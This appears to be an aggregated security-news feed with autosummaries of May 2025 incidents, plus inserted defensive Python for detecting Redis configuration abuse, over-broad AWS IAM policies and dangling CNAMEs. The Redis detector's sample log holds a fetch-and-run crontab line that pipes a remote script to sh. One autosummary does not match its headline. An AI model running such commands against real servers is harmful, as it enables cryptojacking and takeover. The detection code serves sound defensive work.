Counterfeit Facebook pages and sponsored ads on the social media platform are being employed to direct users to fake websites masquerading as Kling AI with the goal of tricking victims into downloading malware. Kling AI is an artificial intelligence (AI)-powered platform to synthesize images and videos from text and image prompts. Launched in June 2024, it's developed by Kuaishou Technology, "

Autosummary: The loader, besides monitoring for analysis tools such as Wireshark, OllyDbg, Procmon, ProcExp, PeStudio, and Fiddler, makes Windows Registry changes to set up persistence and launches the second-stage by injecting it into a legitimate system process like "CasPol.exe" or "InstallUtil.exe" to evade detection. "


How to Detect Phishing Attacks Faster: Tycoon2FA Example

financial
2025-05-21 https://thehackernews.com/2025/05/how-to-detect-phishing-attacks-faster.html
It takes just one email to compromise an entire system. A single well-crafted message can bypass filters, trick employees, and give attackers the access they need. Left undetected, these threats can lead to credential theft, unauthorized access, and even full-scale breaches. As phishing techniques become more evasive, they can no longer be reliably caught by automated solutions alone. Let’s take "

Autosummary: These IOCs can then be used to: block malicious domains across your infrastructure; update email filters and detection rules; enrich your threat intelligence database; and support incident response and SOC workflows. (Figure: IOCs gathered inside ANY.RUN sandbox.) Finally, ANY.RUN generates a well-structured, shareable report that includes all key details, from behavior logs and network traffic to screenshots and IOCs. Upload the file or paste a URL, pick your OS (Windows, Linux, or Android), tweak your settings if needed, and within seconds, you're inside a fully interactive virtual machine ready to investigate. (Figure: Analysis setup inside ANY.RUN sandbox.) To show how easy it is to detect phishing, let's walk through a real-world example, a potential phishing email we analyzed using ANY.RUN, one of the fastest and most intuitive sandboxes available. Step 3: Analyze and Collect IOCs. Once the phishing chain is fully detonated, the next step is what matters most to security teams: gathering indicators of compromise (IOCs) that can be used for detection, response, and future prevention. "


Coinbase data breach impacted 69,461 individuals

financial
2025-05-21 https://securityaffairs.com/178151/data-breach/coinbase-data-breach-impacted-69461-individuals.html
Cryptocurrency exchange Coinbase announced that the recent data breach exposed data belonging to 69,461 individuals. Coinbase disclosed that a data breach impacted 69,461 individuals after overseas support staff improperly accessed customer and corporate data. Coinbase recently revealed that rogue contractors stole data on under 1% of users and demanded $20M; the data breach was initially […]

Autosummary: Exposed data included name, address, phone, and email; masked Social Security numbers (last 4 digits only); masked bank-account numbers and some bank account identifiers; government-ID images (e.g., driver’s license, passport); account data (balance snapshots and transaction history); and limited corporate data (including documents, training material, and communications available to support agents).


U.S. CISA adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog

exploits industry
2025-05-21 https://securityaffairs.com/178140/security/u-s-cisa-adds-ivanti-epmm-mdaemon-email-server-srimax-output-messenger-zimbra-collaboration-and-zkteco-biotime-flaws-to-its-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog. The agency added flaws in Ivanti Endpoint Manager Mobile (EPMM), MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions […]

Autosummary: U.S. CISA adds Ivanti EPMM, MDaemon Email Server, Srimax Output Messenger, Zimbra Collaboration, and ZKTeco BioTime flaws to its Known Exploited Vulnerabilities catalog. Pierluigi Paganini, May 21, 2025.


UK exposes Russian cyber campaign targeting support for Ukraine

rusia-ucrania
2025-05-21 https://www.bbc.com/news/articles/c17rrjdr79po
A joint investigation by the UK and allies found Russian hackers in the systems of logistics organisations.



3AM ransomware uses spoofed IT calls, email bombing to breach networks

exploits ransomware
2025-05-21 https://www.bleepingcomputer.com/news/security/3am-ransomware-uses-spoofed-it-calls-email-bombing-to-breach-networks/
A 3AM ransomware affiliate is conducting highly targeted attacks using email bombing and spoofed IT support calls to socially engineer employees into giving credentials for remote access to corporate systems. [...]

Autosummary: Next, the attacker downloaded and extracted a malicious archive from a spoofed domain, containing a VBS script, a QEMU emulator, and a Windows 7 image pre-loaded with the QDoor backdoor.


Lumma infostealer malware operation disrupted, 2,300 domains seized

exploits
2025-05-21 https://www.bleepingcomputer.com/news/security/lumma-infostealer-malware-operation-disrupted-2-300-domains-seized/
Earlier this month, a coordinated disruption action targeting the Lumma malware-as-a-service (MaaS) information stealer operation seized thousands of domains, part of its infrastructure backbone worldwide. [...]

Autosummary: After compromising a system, Lumma can steal data from web browsers and applications, including cryptocurrency wallets and cookies, credentials, passwords, credit cards, and browsing history from Google Chrome, Microsoft Edge, Mozilla Firefox, and other Chromium-based browsers.


ThreatLocker Patch Management: A Security-First Approach to Closing Vulnerability Windows

exploits
2025-05-21 https://www.bleepingcomputer.com/news/security/threatlocker-patch-management-a-security-first-approach-to-closing-vulnerability-windows/
Patching is basic cyber hygiene, but executing it at scale, securely, and fast? That's the real challenge. ThreatLocker's Patch Management flips the script with control, visibility, and Zero Trust workflows built for today's threat landscape. [...]

Autosummary: ThreatLocker Patch Management: Designed for Zero Trust Environments. ThreatLocker flips the typical patching script by assuming that every change, even a vendor patch, must be treated as untrusted until verified. ThreatLocker Ringfencing™ controls what approved applications can access (files, scripts, or the internet), stopping living-off-the-land attacks and preventing lateral movement before it starts. Closing the Vulnerability Gap: Visibility, Control, Speed. ThreatLocker Patch Management isn’t just about automating updates; it’s about giving security teams the tools they need to understand the security and operational impact of patches before hitting deploy, with greater control, visibility, and confidence over patching workflows and without compromising the stability of production systems. According to CISA's 2023 Top Routinely Exploited Vulnerabilities advisory, many breaches traced back to vulnerabilities that had patches available for months, or even years, a clear sign that it's not awareness that's lacking, but execution.


Lumma Stealer Malware-as-a-Service operation disrupted

exploits
2025-05-21 https://www.helpnetsecurity.com/2025/05/21/lumma-stealer-malware-as-a-service-operation-disrupted/

A coordinated action by US, European and Japanese authorities and tech companies like Microsoft and Cloudflare has disrupted the infrastructure behind Lumma Stealer, the most significant infostealer threat at the moment. What is Lumma Stealer? Lumma Stealer is a Malware-as-a-Service offering beloved by a wide variety of threat actors. The malware is able to steal credentials, financial data, and personal information, which is then sold through a dedicated marketplace. It’s also able to deliver additional malicious …

The post Lumma Stealer Malware-as-a-Service operation disrupted appeared first on Help Net Security.


Autosummary: The organizations involved in the joint action include the US DoJ, Europol, Japan’s Cybercrime Control Center (which helped suspend Lumma infrastructure in Japan), Microsoft’s Digital Crimes Unit, Cloudflare, Lumen Technologies, Bitsight, ESET, CleanDNS, GMO Registry, and Orrick.


Russian hackers breach orgs to track aid routes to Ukraine

rusia-ucrania
2025-05-21 https://www.bleepingcomputer.com/news/security/russian-hackers-breach-orgs-to-track-aid-routes-to-ukraine/
A Russian state-sponsored cyberespionage campaign attributed to APT28 (Fancy Bear/Forest Blizzard) hackers has been targeting and compromising international organizations since 2022 to disrupt aid efforts to Ukraine. [...]

Autosummary: According to the report, the hackers gained initial access using multiple techniques, among them: credential guessing or brute force; spear-phishing for credentials; spear-phishing to deliver malware; exploiting the Outlook NTLM vulnerability CVE-2023-23397; leveraging vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) in the Roundcube open-source webmail software; exploiting internet-facing infrastructure, corporate VPNs included, via public vulnerabilities and SQL injection; and exploiting the WinRAR vulnerability CVE-2023-38831. To hide the origin of the attack, APT28 routed their communication through compromised small office/home office devices that were in proximity to the target.


Russian Hackers Exploit Email and VPN Vulnerabilities to Spy on Ukraine Aid Logistics

exploits industry rusia-ucrania
2025-05-21 https://thehackernews.com/2025/05/russian-hackers-exploit-email-and-vpn.html
Russian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022. The activity has been assessed to be orchestrated by APT28 (aka BlueDelta, Fancy Bear, or Forest Blizzard), which is linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, Military Unit 26165.

Autosummary: Targets of the campaign include companies involved in the coordination, transport, and delivery of foreign assistance to Ukraine, according to a joint advisory released by agencies from Australia, Canada, Czechia, Denmark, Estonia, France, Germany, the Netherlands, Poland, the United Kingdom, and the United States.


A cyberattack was responsible for the week-long outage affecting Cellcom wireless network

ciber
2025-05-21 https://securityaffairs.com/178158/security/a-cyberattack-was-responsible-for-the-week-long-outage-affecting-cellcom-wireless-network.html
Cellcom, a regional wireless carrier based in Wisconsin (US), confirmed that a cyberattack caused the week-long outage affecting voice and text services in Wisconsin and Upper Michigan during the past week. The company announced it […]

Autosummary: Cellcom, a regional wireless carrier based in Wisconsin (US), announced that a cyberattack is the cause of a service outage it faced during the past week. Pierluigi Paganini, May 21, 2025.


Smashing Security podcast #418: Grid failures, Instagram scams, and Legal Aid leaks

financial
2025-05-21 https://grahamcluley.com/smashing-security-podcast-418/
In this week’s episode, Graham investigates the mysterious Iberian Peninsula blackout (aliens? toaster? cyberattack?), Carole dives into the UK legal aid hack that exposed deeply personal data of society's most vulnerable, and Dinah Davis recounts how Instagram scammers hijacked her daughter’s account, and how a parental control accidentally saved the day.

Autosummary: Hosts: Graham Cluley (@grahamcluley.com), Carole Theriault (@caroletheriault). Guest: Dinah Davis. Sponsored by: Vanta – Expand the scope of your security program with market-leading compliance automation… while saving time and money.


Cybersecurity jobs available right now: May 20, 2025

ciber
2025-05-20 https://www.helpnetsecurity.com/2025/05/20/cybersecurity-jobs-available-right-now-may-20-2025/

CISO, Vault Cloud | Australia | Hybrid. As a CISO, you will lead the company’s cloud security strategy, scale the SOC team, and manage cyber threats to protect national data. You’ll work with stakeholders to enhance security, develop advanced tools, maintain up-to-date policies, and align the company’s direction with government and industry partners. Chief Information Officer, Aspira | USA | On-site. As a Chief Information Officer, you will create, …

The post Cybersecurity jobs available right now: May 20, 2025 appeared first on Help Net Security.


Autosummary:
Senior Cloud Security Engineer, DevSecOps, Figment | Canada | Remote. As a Senior Cloud Security Engineer, DevSecOps, you will design, implement, and manage security controls for cloud infrastructure in AWS and GCP.
Chief Information Officer, Aspira | USA | On-site. As a Chief Information Officer, you will create, implement, and maintain comprehensive policies, procedures, and frameworks that adhere to industry best practices.
Information Security Operations Manager, Chalhoub Group | UAE | On-site. As an Information Security Operations Manager, you will oversee global SOC activities, ensuring 24/7 monitoring, detection, and response to security threats.
Red Team Operator, Bayer | Israel | Hybrid. As a Red Team Operator, you will lead full-scope engagements: initial access, C2, evasion, lateral movement, and objective execution.
Insider Threat Program Lead, Marvell Technology | USA | Remote (no longer accepting applications). As an Insider Threat Program Lead, you will design, implement, and manage Marvell’s Insider Threat Program, ensuring alignment with organizational goals, industry best practices and regulatory requirements.
DevSecOps Engineer, Leonar | France | On-site. As a DevSecOps Engineer, you will drive security best practices, maintain compliance with SOC 2 and ISO 27001, propose new security measures, and support audit processes.


The Windows Subsystem for Linux goes open source

Linux
2025-05-20 https://www.helpnetsecurity.com/2025/05/20/microsoft-wsl-open-sourced/

Microsoft has officially open-sourced the Windows Subsystem for Linux (WSL), closing the very first issue ever filed on the Microsoft/WSL GitHub repository: “Will this be open source?” WSL allows developers to run unmodified Linux command-line tools, utilities, and applications directly on Windows, without the overhead of a traditional virtual machine or dual-boot setup.

The post The Windows Subsystem for Linux goes open source appeared first on Help Net Security.




Absolute Extreme Resilience accelerates recovery following cyberattacks and IT incidents

ciber
2025-05-20 https://www.helpnetsecurity.com/2025/05/20/absolute-extreme-resilience/

Absolute Security announced new Extreme Resilience capabilities available in Rehydrate, an Absolute Resilience Platform module. Rehydrate enables remote restoration of Windows endpoints at enterprise scale with a single click. It delivers full recovery even when the device OS and other security or management tools have crashed, been compromised, or become corrupted. With these new Extreme Resilience capabilities, Rehydrate is now the only business continuity restoration solution that offers playbook-driven response capabilities that empower Security and …

The post Absolute Extreme Resilience accelerates recovery following cyberattacks and IT incidents appeared first on Help Net Security.




Go-Based Malware Deploys XMRig Miner on Linux Hosts via Redis Configuration Abuse

exploits Linux
2025-05-20 https://thehackernews.com/2025/05/go-based-malware-deploys-xmrig-miner-on.html
Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers. The malicious activity has been codenamed RedisRaider by Datadog Security Labs. "RedisRaider aggressively scans randomized portions of the IPv4 space and uses legitimate Redis configuration commands to execute malicious cron jobs on vulnerable systems,"

Autosummary: "While regular users received the bulk of authentication attempts (50,214), admin accounts and shared mailboxes were targeted at a specific pattern, with admin accounts receiving 9,847 attempts across 432 IPs over 8 hours, suggesting an average of 22.79 attempts per IP and a velocity of 1,230.87 attempts per hour," the company said.
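"Legitimate Redis configuration commands" in the RedisRaider description above refers to the long-standing trick of pointing the RDB snapshot at a cron or SSH directory (`CONFIG SET dir`, `CONFIG SET dbfilename`), storing a key whose value contains a crontab line, and forcing a `SAVE`, so the database dump lands on disk as a file the system will execute. The block below is an added example, not code from the article or from Datadog: it parses constructed `redis-cli MONITOR` output and flags a client that chains those commands, rating the finding higher when the target directory is one the server should never write into. The monitor lines, addresses and URL are invented for the example; the line format and escaping follow what MONITOR emits.

```python
import re
from collections import defaultdict

# Constructed `redis-cli MONITOR` output, not a capture from the campaign above.
# Client 10.0.0.5 redirects the RDB file into a cron directory and forces a SAVE;
# client 10.0.0.8 only reads configuration and must not be flagged.
SAMPLE_MONITOR = r"""
1747728000.101 [0 10.0.0.5:43210] "PING"
1747728000.102 [0 10.0.0.5:43210] "SET" "backup1" "\n\n* * * * * curl -fsSL http://203.0.113.9/x.sh | sh\n\n"
1747728000.103 [0 10.0.0.5:43210] "CONFIG" "SET" "dir" "/var/spool/cron/crontabs"
1747728000.104 [0 10.0.0.5:43210] "CONFIG" "SET" "dbfilename" "root"
1747728000.105 [0 10.0.0.5:43210] "SAVE"
1747728000.201 [0 10.0.0.8:51000] "GET" "session:abc"
1747728000.202 [0 10.0.0.8:51000] "CONFIG" "GET" "maxmemory"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<rest>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "a": "\a", "b": "\b", '"': '"', "\\": "\\"}

# An RDB file written under any of these turns the key/value store into a file-write primitive.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron", "/root/.ssh", "/home/", "/var/www", "/usr/share/nginx")


def unescape(s):
    """Undo MONITOR's C-style escaping (\\n, \\", \\xHH, ...)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt == "x" and i + 3 < len(s):
                out.append(chr(int(s[i + 2:i + 4], 16)))
                i += 4
                continue
            out.append(_ESCAPES.get(nxt, nxt))
            i += 2
            continue
        out.append(s[i])
        i += 1
    return "".join(out)


def parse_monitor_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"ts": float(m.group("ts")), "client": m.group("client"),
            "args": [unescape(a) for a in ARG_RE.findall(m.group("rest"))]}


def detect_config_abuse(monitor_text):
    """Flag CONFIG SET dir/dbfilename followed by SAVE or BGSAVE from the same client."""
    state = defaultdict(dict)   # per-client view of the persistence settings it changed
    findings = []
    for line in monitor_text.splitlines():
        ev = parse_monitor_line(line)
        if not ev or not ev["args"]:
            continue
        args, st = ev["args"], state[ev["client"]]
        cmd = args[0].upper()
        if cmd == "CONFIG" and len(args) >= 4 and args[1].upper() == "SET":
            if args[2].lower() in ("dir", "dbfilename"):
                st[args[2].lower()] = args[3]
        elif cmd == "SET" and len(args) >= 3 and "\n" in args[2]:
            st["payload_key"] = args[1]   # multi-line value: crontab / authorized_keys / webshell shape
        elif cmd in ("SAVE", "BGSAVE") and "dir" in st and "dbfilename" in st:
            target = st["dir"].rstrip("/") + "/" + st["dbfilename"]
            findings.append({
                "client": ev["client"], "ts": ev["ts"], "written_file": target,
                "payload_key": st.get("payload_key"),
                "severity": "high" if st["dir"].startswith(SENSITIVE_DIRS) else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in detect_config_abuse(SAMPLE_MONITOR):
        print(finding)
```

Detection after the fact is the fallback; the same chain is blocked outright with `rename-command CONFIG ""` (or an ACL that denies `@dangerous`), `protected-mode yes`, a non-public `bind` address and `requirepass`, and by running redis-server as an unprivileged user so a redirected SAVE into a cron directory fails with a permission error.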


Malicious PyPI Packages Exploit Instagram and TikTok APIs to Validate User Accounts

exploits
2025-05-20 https://thehackernews.com/2025/05/malicious-pypi-packages-exploit.html
Cybersecurity researchers have uncovered malicious packages uploaded to the Python Package Index (PyPI) repository that act as checker tools to validate stolen email addresses against TikTok and Instagram APIs. All three packages are no longer available on PyPI. The names of the Python packages are: checker-SaGaF (2,605 downloads), steinlurks (1,049 downloads), and sinnercore (3,300 downloads).

Autosummary: It achieves this by targeting different API endpoints: i.instagram[.]com/api/v1/users/lookup/, i.instagram[.]com/api/v1/bloks/apps/com.bloks.www.caa.ar.search.async/, i.instagram[.]com/api/v1/accounts/send_recovery_flow_email/, and www.instagram[.]com/api/v1/web/accounts/check_email/. "Sinnercore," on the other hand, aims to trigger the forgot-password flow for a given username, targeting the API endpoint "b.i.instagram[.]com/api/v1/accounts/send_password_reset/" with fake HTTP requests containing the target's username.


UK’s Legal Aid Agency discloses a data breach following April cyber attack

financial
2025-05-20 https://securityaffairs.com/178088/data-breach/uks-legal-aid-agency-discloses-data-breach-following-april-cyber-attack.html
The UK’s Legal Aid Agency suffered a cyberattack in April and has now confirmed that sensitive data was stolen during the incident. The Legal Aid Agency (LAA) revealed that it had suffered a cyberattack on its systems on April 23. The Legal Aid Agency (LAA), part of the UK Ministry of Justice, ensures access to […]

Autosummary: Downloaded data may have included contact details and addresses of applicants, their dates of birth, national ID numbers, criminal history, employment status and financial data such as contribution amounts, debts and payments.


Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang

exploits ransomware
2025-05-20 https://securityaffairs.com/178072/malware/sarcoma-ransomware-unveiled-anatomy-of-a-double-extortion-gang.html
Cybersecurity Observatory of the Unipegaso’s malware lab published a detailed analysis of the Sarcoma ransomware. It is with great pleasure and honor that I present the first report produced by the Malware Analysis Lab, led by Luigi Martire. The lab was established within the Cybersecurity Observatory of the Unipegaso University, which I have the privilege […]



Red Hat Enterprise Linux 10 helps mitigate future quantum-based threats

Linux
2025-05-20 https://www.helpnetsecurity.com/2025/05/20/red-hat-enterprise-linux-10/

Red Hat Enterprise Linux 10 provides a strategic and intelligent backbone for enterprise IT to navigate complexity, accelerate innovation and build a more secure computing foundation for the future. As enterprise IT grapples with the proliferation of hybrid environments and the imperative to integrate AI workloads, the need for an intelligent, resilient and durable operating system has never been greater. Red Hat Enterprise Linux 10 rises to this challenge, delivering a platform engineered for agility, …

The post Red Hat Enterprise Linux 10 helps mitigate future quantum-based threats appeared first on Help Net Security.


Autosummary: “With intelligent features using gen AI, unified hybrid cloud management through image mode and a proactive approach to security with post-quantum cryptography, Red Hat Enterprise Linux 10 provides the robust and innovative foundation needed to thrive in the era of hybrid cloud and AI,” said Gunnar Hellekson, VP and GM, Red Hat Enterprise Linux, Red Hat. Key additions in Red Hat Enterprise Linux 10 include capabilities and innovations to: get ready for the hybrid cloud, today, with pre-tuned, fully supported and ready-to-run Red Hat Enterprise Linux images across AWS, Google Cloud and Microsoft Azure.


Trojanized KeePass opens doors for ransomware attackers

exploits ransomware
2025-05-20 https://www.helpnetsecurity.com/2025/05/20/trojanized-keepass-keeloader-ransomware/

A suspected initial access broker has been leveraging trojanized versions of the open-source KeePass password manager to set the stage for ransomware attacks, WithSecure researchers have discovered. KeeLoader: Password manager that acts as data stealer and malware loader. In February 2025, WithSecure’s incident responders were hired by a European IT service provider to help with response and remediation after a ransomware gang encrypted their VMware ESXi servers’ datastores. While the attack itself was relatively typical, …

The post Trojanized KeePass opens doors for ransomware attackers appeared first on Help Net Security.


Autosummary: During this engagement, WithSecure’s threat intelligence analysts have also uncovered a slew of malvertising campaigns, typosquatted domains, and subdomains that served KeeLoader, the Nitrogen loader posing as legitimate software (WinSCP, TreeSize Free), and phishing pages impersonating financial institutions and services, as well as evidence of active, 8-month-long development of KeeLoader.


South Asian Ministries Hit by SideWinder APT Using Old Office Flaws and Custom Malware

exploits
2025-05-20 https://thehackernews.com/2025/05/south-asian-ministries-hit-by.html
High-level government institutions in Sri Lanka, Bangladesh, and Pakistan have emerged as the target of a new campaign orchestrated by a threat actor known as SideWinder. "The attackers used spear phishing emails paired with geofenced payloads to ensure that only victims in specific countries received the malicious content," Acronis researchers Santiago Pontiroli, Jozsef Gegeny, and Prakas



AWS Default IAM Roles Found to Enable Lateral Movement and Cross-Service Exploitation

exploits
2025-05-20 https://thehackernews.com/2025/05/aws-default-iam-roles-found-to-enable.html
Cybersecurity researchers have discovered risky default identity and access management (IAM) roles impacting Amazon Web Services that could open the door for attackers to escalate privileges, manipulate other AWS services, and, in some cases, even fully compromise AWS accounts. "These roles, often created automatically or recommended during setup, grant overly broad permissions, such as full S3

Autosummary: Some of the identified services with the permissive policy: Amazon SageMaker AI, which creates a default execution role named AmazonSageMaker-ExecutionRole-<Date&Time> when setting up a SageMaker Domain, with a custom policy equivalent to AmazonS3FullAccess; AWS Glue, which creates a default AWSGlueServiceRole role with the AmazonS3FullAccess policy; and Amazon EMR, which creates a default AmazonEMRStudio_RuntimeRole_<Epoch-time> role that's assigned the AmazonS3FullAccess policy. In a hypothetical attack scenario, a threat actor could upload a malicious machine learning model to Hugging Face that, when imported into SageMaker, can result in the execution of arbitrary code, which could then be used to seize control of other AWS services like Glue by injecting a backdoor capable of stealing IAM credentials of the Glue job.
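The common denominator in the roles listed above is an Allow statement that pairs a wildcard S3 action with a wildcard resource, which is what lets one compromised service read and rewrite every bucket in the account, including the ones other services trust. The following is an added example, not code from the article or from AWS: a policy-document checker that finds such statements (handling `Action`/`Resource` given as strings or lists, and the `NotAction`/`NotResource` forms that are broad by construction), together with a least-privilege replacement scoped to named buckets. The policy documents and bucket name are constructed for the example.

```python
import json

# Constructed policy documents, not pulled from an AWS account. The first mirrors what the
# article describes: an auto-created execution role carrying the equivalent of AmazonS3FullAccess.
BROAD_EXECUTION_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["logs:CreateLogGroup", "logs:PutLogEvents"], "Resource": "*"},
    ],
}

# Action patterns that reach every bucket in the account when paired with a wildcard resource.
BROAD_S3_ACTIONS = {"*", "s3:*", "s3:get*", "s3:put*", "s3:delete*"}
WILDCARD_S3_RESOURCES = {"*", "arn:aws:s3:::*", "arn:aws:s3:::*/*"}


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def find_broad_s3_grants(policy):
    """Return the Allow statements that grant broad S3 actions on every bucket."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        # Allow + NotAction / NotResource means "everything except", so treat it as a wildcard.
        actions = ["*"] if "NotAction" in stmt else [a.lower() for a in _as_list(stmt.get("Action"))]
        resources = ["*"] if "NotResource" in stmt else _as_list(stmt.get("Resource"))
        broad = sorted(a for a in actions if a in BROAD_S3_ACTIONS)
        wild = sorted(r for r in resources if r in WILDCARD_S3_RESOURCES)
        if broad and wild:
            findings.append({"statement": idx, "actions": broad, "resources": wild,
                             "has_condition": "Condition" in stmt})
    return findings


def scoped_s3_policy(bucket_names, write=True):
    """Least-privilege replacement: list the named buckets, read (optionally write) their objects."""
    buckets = [f"arn:aws:s3:::{b}" for b in bucket_names]
    objects = [f"arn:aws:s3:::{b}/*" for b in bucket_names]
    object_actions = ["s3:GetObject"] + (["s3:PutObject"] if write else [])
    return {
        "Version": "2012-10-17",
        "Statement": [
            # ListBucket is evaluated against the bucket ARN, object actions against the object ARN,
            # so the two get separate statements instead of one over-broad resource list.
            {"Effect": "Allow", "Action": ["s3:ListBucket"], "Resource": buckets},
            {"Effect": "Allow", "Action": object_actions, "Resource": objects},
        ],
    }


if __name__ == "__main__":
    print(json.dumps(find_broad_s3_grants(BROAD_EXECUTION_POLICY), indent=2))
    print(json.dumps(scoped_s3_policy(["ml-training-data"]), indent=2))
```

In a real account the inputs come from each role's inline and attached policy documents (the IAM `GetRolePolicy` and `GetPolicyVersion` calls return them as JSON); `has_condition` is reported rather than used to suppress a finding, because a condition narrows the grant only if someone reads it and confirms it does.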


The Crowded Battle: Key Insights from the 2025 State of Pentesting Report

government
2025-05-20 https://thehackernews.com/2025/05/the-crowded-battle-key-insights-from.html
In the newly released 2025 State of Pentesting Report, Pentera surveyed 500 CISOs from global enterprises (200 from within the USA) to understand the strategies, tactics, and tools they use to cope with the thousands of security alerts, the persisting breaches and the growing cyber risks they have to handle. The findings reveal a complex picture of progress, challenges, and a shifting mindset

Autosummary: Over the past year, 45% of enterprises expanded their security technology stacks, with organizations now managing an average of 75 different security solutions. Yet despite these layers of security tools, 67% of U.S. enterprises experienced a breach in the past 24 months. The growing number of deployed tools has a few effects on the daily operation and the overall cyber posture of the organization.


Cyber attack threat keeps me awake at night, bank boss says

financial
2025-05-20 https://www.bbc.com/news/articles/c4g3372vl3yo
Ian Stuart, from HSBC, said banks were spending "enormous" sums shoring up their IT systems.



SK Telecom says malware breach lasted 3 years, impacted 27 million numbers

exploits Telcos
2025-05-20 https://www.bleepingcomputer.com/news/security/sk-telecom-says-malware-breach-lasted-3-years-impacted-27-million-numbers/
SK Telecom says that the cybersecurity incident it disclosed in April actually began back in 2022, ultimately exposing the USIM data of 27 million subscribers. [...]

Autosummary: This breach allowed attackers to steal data that included IMSI, USIM authentication keys, network usage data, and SMS/contacts stored in the SIM.


Hazy Hawk gang exploits DNS misconfigs to hijack trusted domains

exploits
2025-05-20 https://www.bleepingcomputer.com/news/security/hazy-hawk-gang-exploits-dns-misconfigs-to-hijack-trusted-domains/
A threat actor named "Hazy Hawk" has been using DNS CNAME hijacking to hijack abandoned cloud endpoints of domains belonging to trusted organizations and incorporate them in large-scale scam delivery and traffic distribution systems (TDS). [...]



RVTools hit in supply chain attack to deliver Bumblebee malware

exploits
2025-05-20 https://www.bleepingcomputer.com/news/security/rvtools-hit-in-supply-chain-attack-to-deliver-bumblebee-malware/
The official website for the RVTools VMware management tool was taken offline in what appears to be a supply chain attack that distributed a trojanized installer to drop the Bumblebee malware loader on users' machines. [...]

Autosummary: “When it came back online, the download had changed: the file size was smaller, and the hash now matched the clean version listed on the site.” Bumblebee is a malware loader that is typically promoted via SEO poisoning, malvertising, and phishing attacks. While the Conti ransomware operation shut down in 2022, many of its members split off into other ransomware operations, including Black Basta, Royal, Silent Ransom, and others, who likely still have access to the tooling.


Malware-infected printer delivered something extra to Windows users

exploits
2025-05-20 https://www.malwarebytes.com/blog/news/2025/05/malware-infected-printer-delivered-something-extra-to-windows-users
You'd hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you'd be wrong.



Hazy Hawk Exploits DNS Records to Hijack CDC, Corporate Domains for Malware Delivery

exploits
2025-05-20 https://thehackernews.com/2025/05/hazy-hawk-exploits-dns-records-to.html
A threat actor known as Hazy Hawk has been observed hijacking abandoned cloud resources of high-profile organizations, including Amazon S3 buckets and Microsoft Azure endpoints, by leveraging misconfigurations in the Domain Name System (DNS) records. The hijacked domains are then used to host URLs that direct users to scams and malware via traffic distribution systems (TDSes), according to

Autosummary: In doing so, the idea is to flood a victim's device with push notifications and deliver an endless torrent of malicious content, with each notification leading to different scams, scareware, and fake surveys, and accompanied by requests to allow more push notifications.
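Both Hazy Hawk items above describe the same precondition: a CNAME in a trusted zone still points at a cloud hostname whose underlying resource (bucket, App Service, distribution) was deleted, so whoever re-registers that resource name inherits the subdomain. The block below is an added example, not code from either article or from Infoblox: it walks a constructed zone export, classifies CNAME targets by provider, and reports each as dangling (target no longer resolves), resolving, or needing an HTTP check. The last status matters for S3 and similar wildcard-DNS endpoints, where the hostname resolves whether or not the bucket exists, so NXDOMAIN is not a usable signal and the bucket itself has to be probed. The records, resolver answers and provider table are constructed assumptions for the example; `resolve_live` is the drop-in for real lookups.

```python
import socket

# Constructed zone data for a hypothetical example.org; not records from any organization named above.
RECORDS = [
    ("promo.example.org", "CNAME", "example-promo.s3-website-us-east-1.amazonaws.com"),
    ("app.example.org", "CNAME", "retired-app-2019.azurewebsites.net"),
    ("www.example.org", "CNAME", "d111111abcdef8.cloudfront.net"),
    ("mail.example.org", "A", "203.0.113.25"),
]

# Constructed resolver answers for the example; a missing key stands for NXDOMAIN.
STUB_ANSWERS = {
    "example-promo.s3-website-us-east-1.amazonaws.com": "203.0.113.30",
    "d111111abcdef8.cloudfront.net": "203.0.113.20",
}

# Provider suffixes that commonly host abandoned resources (assumed list, extend for your estate).
# The flag marks endpoints that resolve whether or not the resource exists (wildcard DNS),
# where absence must be confirmed at the HTTP layer instead. More specific suffixes come first.
CLOUD_SUFFIXES = [
    (".s3.amazonaws.com", "aws-s3", True),
    (".amazonaws.com", "aws", True),               # covers s3-website-<region> endpoints
    (".cloudfront.net", "aws-cloudfront", False),
    (".azurewebsites.net", "azure-app-service", False),
    (".cloudapp.azure.com", "azure-vm", False),
    (".trafficmanager.net", "azure-traffic-manager", False),
    (".blob.core.windows.net", "azure-storage", False),
    (".github.io", "github-pages", True),
    (".herokuapp.com", "heroku", True),
]


def classify_target(target):
    """Return (provider, wildcard_dns) for a CNAME target, or (None, False) if not a cloud endpoint."""
    t = target.lower().rstrip(".")
    for suffix, provider, wildcard in CLOUD_SUFFIXES:
        if t.endswith(suffix):
            return provider, wildcard
    return None, False


def resolve_stub(name):
    return STUB_ANSWERS.get(name.lower())


def resolve_live(name):
    """Real resolver for production use; None on NXDOMAIN or any other lookup failure."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def find_dangling_cnames(records, resolve=resolve_stub):
    findings = []
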